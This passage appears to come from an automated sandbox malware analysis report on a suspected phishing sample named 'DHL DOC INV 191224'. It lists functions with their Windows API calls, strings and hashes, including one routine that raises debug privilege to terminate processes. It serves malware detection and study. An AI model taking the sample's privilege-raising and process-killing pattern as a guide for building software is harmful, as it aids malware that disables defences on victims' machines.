                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BA1B3
                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 003BA268
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 003BA273
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003BA2C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                        • String ID: SeDebugPrivilege
                                                                                                                        • API String ID: 2533919879-2896544425
                                                                                                                        • Opcode ID: 64232c8e677c9fa6148473354d9beefab5a04011d07ae75428ae2a799a328524
                                                                                                                        • Instruction ID: a207151200fc5af053a5e8eb23148e5c5a06724e922290acc59c596a0e763207
                                                                                                                        • Opcode Fuzzy Hash: 64232c8e677c9fa6148473354d9beefab5a04011d07ae75428ae2a799a328524
                                                                                                                        • Instruction Fuzzy Hash: 7D61DF34204A42AFD722DF18C484F55BBE4AF44318F19848CE5668FBA3C776EC45CB82
                                                                                                                        Function 003C3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003C3925
                                                                                                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 003C393A
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003C3954
                                                                                                                        • _wcslen.LIBCMT ref: 003C3999
                                                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003C39C6
                                                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003C39F4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window_wcslen
                                                                                                                        • String ID: SysListView32
                                                                                                                        • API String ID: 2147712094-78025650
                                                                                                                        • Opcode ID: e8703e918ef61a2947f6e6e0d53aa54279994193260cb9f6789ea85e8b2e0471
                                                                                                                        • Instruction ID: db07ba5dd6e9be34636e0de25a13e994670e54c9d709724978957ada5982eedb
                                                                                                                        • Opcode Fuzzy Hash: e8703e918ef61a2947f6e6e0d53aa54279994193260cb9f6789ea85e8b2e0471
                                                                                                                        • Instruction Fuzzy Hash: 3541D431A00318ABEF229F64CC45FEA7BA9FF08350F11452AF958E7291D7719E94CB90
                                                                                                                        Function 00352D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00352D4B
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00352D53
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00352DE1
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00352E0C
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00352E61
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: &H5$csm
                                                                                                                        • API String ID: 1170836740-3207714950
                                                                                                                        • Opcode ID: 8b4475d9261b5722502fc78fac7b62f483cf61a9aa47167a273b0f1b3b17a854
                                                                                                                        • Instruction ID: 7303c40605d5e6402411e5a1fc2584b8fd825eed0015074bfee6c7471b105db0
                                                                                                                        • Opcode Fuzzy Hash: 8b4475d9261b5722502fc78fac7b62f483cf61a9aa47167a273b0f1b3b17a854
                                                                                                                        • Instruction Fuzzy Hash: 3F419434A00209DBCF16DF68C845E9FBBF5BF46366F158155EC24AB362D731AA09CB90
                                                                                                                        Function 003C81DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0038F3AB,00000000,?,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 003C824C
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 003C8272
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 003C82D1
                                                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 003C82E5
                                                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 003C830B
                                                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003C832F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 642888154-2513823414
                                                                                                                        • Opcode ID: c29b87169cb2cef1ae14100d2324e8fd691b3270df35eb1b35bf0a4952933788
                                                                                                                        • Instruction ID: 85361f9034726c9eead3bd9465f2abb9acb70f645d4db18a0717f1bea566d4ad
                                                                                                                        • Opcode Fuzzy Hash: c29b87169cb2cef1ae14100d2324e8fd691b3270df35eb1b35bf0a4952933788
                                                                                                                        • Instruction Fuzzy Hash: FA418E78601644AFDB22CF15C999FA47BF0FB0A714F1952ADE508DB2B2CB32AD41CB54
                                                                                                                        Function 0039C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0039C913
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconLoad
                                                                                                                        • String ID: blank$info$question$stop$warning
                                                                                                                        • API String ID: 2457776203-404129466
                                                                                                                        • Opcode ID: b9faec9c173ab57c1955b909a7c29104882f85e2a8b33c7e3224c5a068fa0319
                                                                                                                        • Instruction ID: dd97bf855fd3eb458460b9adbc45feab16707e2b8921f62b1916931b31f15dd6
                                                                                                                        • Opcode Fuzzy Hash: b9faec9c173ab57c1955b909a7c29104882f85e2a8b33c7e3224c5a068fa0319
                                                                                                                        • Instruction Fuzzy Hash: D6110D3169D30ABAEF076B549C83CEB779CDF15359B21102AF904A6192D7706D445364
                                                                                                                        Function 0039ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 952045576-0
                                                                                                                        • Opcode ID: 4b617a2600b6f1758d0505ee2f38c7528731c3987b62f97d81b1c69dfeacc731
                                                                                                                        • Instruction ID: 354658e010cf9b9ddf364570575040eca64697fd6ba7675e3a6347afc7f3108a
                                                                                                                        • Opcode Fuzzy Hash: 4b617a2600b6f1758d0505ee2f38c7528731c3987b62f97d81b1c69dfeacc731
                                                                                                                        • Instruction Fuzzy Hash: E5418065C1021875CB12EBB4888BDDFB7B8AF45711F508866E918E7132FB34E259C3E5
                                                                                                                        Function 0034F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0034F953
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0038F3D1
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0038682C,00000004,00000000,00000000), ref: 0038F454
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 48b2b04d575b2fccf4cd6748d51597ebe0122daf4a2d7f723da7ba817db42526
                                                                                                                        • Instruction ID: fe02a9a0c272762e68d89e9b64c303a04cba782f9e97d67dde06c86838a58c48
                                                                                                                        • Opcode Fuzzy Hash: 48b2b04d575b2fccf4cd6748d51597ebe0122daf4a2d7f723da7ba817db42526
                                                                                                                        • Instruction Fuzzy Hash: FC41D931618740BED7379F298988B2A7BD5AB56314F1D443DE0479F970C771B980C711
                                                                                                                        Function 003C2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 003C2D1B
                                                                                                                        • GetDC.USER32(00000000), ref: 003C2D23
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003C2D2E
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 003C2D3A
                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 003C2D76
                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003C2D87
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 003C2DC2
                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003C2DE1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3864802216-0
                                                                                                                        • Opcode ID: c6395a60523ca25258029fc719969b66b5d7128e5ad041c7cd0f10ff3878dbfd
                                                                                                                        • Instruction ID: 076895cf6918434b9e03ea59e2a23f55b5c060add4db5a2b1b10225b210eeab1
                                                                                                                        • Opcode Fuzzy Hash: c6395a60523ca25258029fc719969b66b5d7128e5ad041c7cd0f10ff3878dbfd
                                                                                                                        • Instruction Fuzzy Hash: BA319C72211214BFEB128F50CC8AFEB3BADEF19711F084055FE09DA291C675AC51CBA0
                                                                                                                        Function 00395622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2931989736-0
                                                                                                                        • Opcode ID: 67b466794834f65e3f414b44121b391586d1d8d2487cf351a28d8e7438f5d26a
                                                                                                                        • Instruction ID: 725f5b10d6513255fce0f7b741ef83a92355ca1906c1a7e14e25c278beccfd2e
                                                                                                                        • Opcode Fuzzy Hash: 67b466794834f65e3f414b44121b391586d1d8d2487cf351a28d8e7438f5d26a
                                                                                                                        • Instruction Fuzzy Hash: 8721DB66741A097BDA175E209D92FFB335DAF20385F444034FD04DEA81F720EE5483A5
                                                                                                                        Function 003B4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                        • API String ID: 0-572801152
                                                                                                                        • Opcode ID: 57cc58aade470db893244a7b11d990a05837adae424ba82c713b0387af437440
                                                                                                                        • Instruction ID: 0cefa0c9726128e1cc8c5ef9cd7c7dbbc8abd8f0656588efd3c1a81a48dc3d79
                                                                                                                        • Opcode Fuzzy Hash: 57cc58aade470db893244a7b11d990a05837adae424ba82c713b0387af437440
                                                                                                                        • Instruction Fuzzy Hash: A5D1D075A0060A9FDF12DFA8C880FEEB7B5BF48348F158069EA15AB680D770DD41CB90
                                                                                                                        Function 00371522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,003717FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 003715CE
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371651
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,003717FB,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716E4
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 003716FB
                                                                                                                          • Part of subcall function 00363820: RtlAllocateHeap.NTDLL(00000000,?,00401444,?,0034FDF5,?,?,0033A976,00000010,00401440,003313FC,?,003313C6,?,00331129), ref: 00363852
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,003717FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00371777
                                                                                                                        • __freea.LIBCMT ref: 003717A2
                                                                                                                        • __freea.LIBCMT ref: 003717AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2829977744-0
                                                                                                                        • Opcode ID: 00b2636993de815f8edfcb20ee78838f84da1d89983d35e12a869fbe2a3607f1
                                                                                                                        • Instruction ID: 4d5683c9a4314e790555b88daafe4319bccec91cf055dd8ceddf00bda716c8ba
                                                                                                                        • Opcode Fuzzy Hash: 00b2636993de815f8edfcb20ee78838f84da1d89983d35e12a869fbe2a3607f1
                                                                                                                        • Instruction Fuzzy Hash: 2A91D573E102469ADB3A8E6CC881EEE7BB9AF45710F198519E809E7140D739DC44CBA0
                                                                                                                        Function 003B4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                        • Opcode ID: 0b9f31d392e77b36d9d5c32c9cb4c37d5bea57d3d06597ba9062e7f3ef9bb2eb
                                                                                                                        • Instruction ID: 75a60b4187353414c85a56d600e567e855b1a72abac8051e818c3f2782f776f6
                                                                                                                        • Opcode Fuzzy Hash: 0b9f31d392e77b36d9d5c32c9cb4c37d5bea57d3d06597ba9062e7f3ef9bb2eb
                                                                                                                        • Instruction Fuzzy Hash: C191C570A00219AFCF22CFA5C845FEEB7B8EF46714F108559F615AB682DB709941CFA4
                                                                                                                        Function 003A1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 003A125C
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 003A1284
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003A12A8
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A12D8
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A135F
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A13C4
                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003A1430
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2550207440-0
                                                                                                                        • Opcode ID: 4eb5823ceb68e240330a77df1e37e1b8a929e389fa9fd5acd040d300c152914b
                                                                                                                        • Instruction ID: cb9bbc8e52674bb705b8ac1a48ce8e9abe9241c3b68b4d0dcf841ae786a1fbf9
                                                                                                                        • Opcode Fuzzy Hash: 4eb5823ceb68e240330a77df1e37e1b8a929e389fa9fd5acd040d300c152914b
                                                                                                                        • Instruction Fuzzy Hash: 28913475A00208AFDB07DF99C884BBEB7B9FF06321F118429E941EB291D774E941CB90
                                                                                                                        Function 0034948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3225163088-0
                                                                                                                        • Opcode ID: 193bfafaed8713ac8f1af2c483efbb12d8cba41b7347e996c4d6ea3286bc1c78
                                                                                                                        • Instruction ID: 797007579a0e28533807adc3e9f975ca7893f8858cc9af3b6328c6f1ede3e4a7
                                                                                                                        • Opcode Fuzzy Hash: 193bfafaed8713ac8f1af2c483efbb12d8cba41b7347e996c4d6ea3286bc1c78
                                                                                                                        • Instruction Fuzzy Hash: 1B913A71D00219EFCB12CFA9CC84AEEBBB9FF49320F25459AE515BB251D374A941CB60
                                                                                                                        Function 003B3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 003B396B
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003B3A7A
                                                                                                                        • _wcslen.LIBCMT ref: 003B3A8A
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003B3C1F
                                                                                                                          • Part of subcall function 003A0CDF: VariantInit.OLEAUT32(00000000), ref: 003A0D1F
                                                                                                                          • Part of subcall function 003A0CDF: VariantCopy.OLEAUT32(?,?), ref: 003A0D28
